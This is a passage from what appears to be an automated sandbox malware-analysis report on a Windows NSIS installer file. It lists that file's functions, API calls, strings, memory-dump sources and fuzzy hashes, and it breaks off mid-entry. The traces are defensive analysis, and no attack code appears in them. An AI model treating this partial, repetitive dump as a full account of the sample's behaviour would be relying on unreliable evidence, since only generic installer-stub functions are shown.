                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                            • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                            • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 3585118688-0
                                                          • Opcode ID: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                          • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                          • Opcode Fuzzy Hash: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                          • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                          Function 00405166 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00405195
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                            • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                          • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                          Function 004056C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                          • CloseHandle.KERNEL32(?), ref: 004056F5
                                                          Strings
                                                          • Error launching installer, xrefs: 004056D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                          • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                          Function 0040388A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76232EE0,00403861,76233420,0040366C,?), ref: 004038A4
                                                          • GlobalFree.KERNEL32(?), ref: 004038AB
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040389C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-3936084776
                                                          • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                          • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                                          • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                          • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                                          Function 004059DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 004059E5
                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 004059F5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-3125694417
                                                          • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                          • Instruction ID: c27c0225baf4744af390cb43684771b46df34b65c4403afa93d532b781e968ba
                                                          • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                          • Instruction Fuzzy Hash: A8D05EB3400920DAD3226B04DC0199F73ACEF1131074644AAF501A21A5DB785D808BBD
                                                          Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2371482983.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371555156.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371583755.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                          Function 00405B19 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                          • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                          • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                          • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9

                                                          Non-executed Functions

                                                          Function 00404B6E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                          • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                          • DeleteObject.GDI32(00000000), ref: 00404C64
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                          • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                          • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                          • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                          • ShowWindow.USER32(00000000), ref: 0040514F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                          • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                          • Opcode Fuzzy Hash: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                          • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                          Function 0040335A Relevance: 63.4, APIs: 27, Strings: 9, Instructions: 383stringfilecomCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #17.COMCTL32 ref: 00403379
                                                          • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                          • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                          • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                          • CharNextW.USER32(00000000,00434000,00000020), ref: 00403403
                                                          • GetTempPathW.KERNEL32(00000400,00436800,00000000,?), ref: 0040353B
                                                          • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
                                                          • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
                                                          • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040356C
                                                          • lstrcatW.KERNEL32(00436800,Low), ref: 00403574
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
                                                          • DeleteFileW.KERNEL32(00436000), ref: 004035A1
                                                          • OleUninitialize.OLE32(?), ref: 0040366C
                                                          • ExitProcess.KERNEL32 ref: 0040368C
                                                          • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
                                                          • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
                                                          • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
                                                          • SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
                                                          • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                          • CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 00403725
                                                          • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                          • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                          • ExitProcess.KERNEL32 ref: 00403827
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                          • API String ID: 4107622049-1875889550
                                                          • Opcode ID: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                          • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                          • Opcode Fuzzy Hash: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                          • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E
                                                          Function 004057D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNEL32(?,?,00436800,76232EE0,00434000), ref: 004057F9
                                                          • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,76232EE0,00434000), ref: 00405841
                                                          • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 00405864
                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 0040586A
                                                          • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 0040587A
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                          • FindClose.KERNEL32(00000000), ref: 00405929
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: \*.*
                                                          • API String ID: 2035342205-1173974218
                                                          • Opcode ID: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                          • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                          • Opcode Fuzzy Hash: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                          • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                          Function 0040659D Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                          • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                          Function 0040628B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,76232EE0,004057F0,?,00436800,76232EE0), ref: 00406296
                                                          • FindClose.KERNEL32(00000000), ref: 004062A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
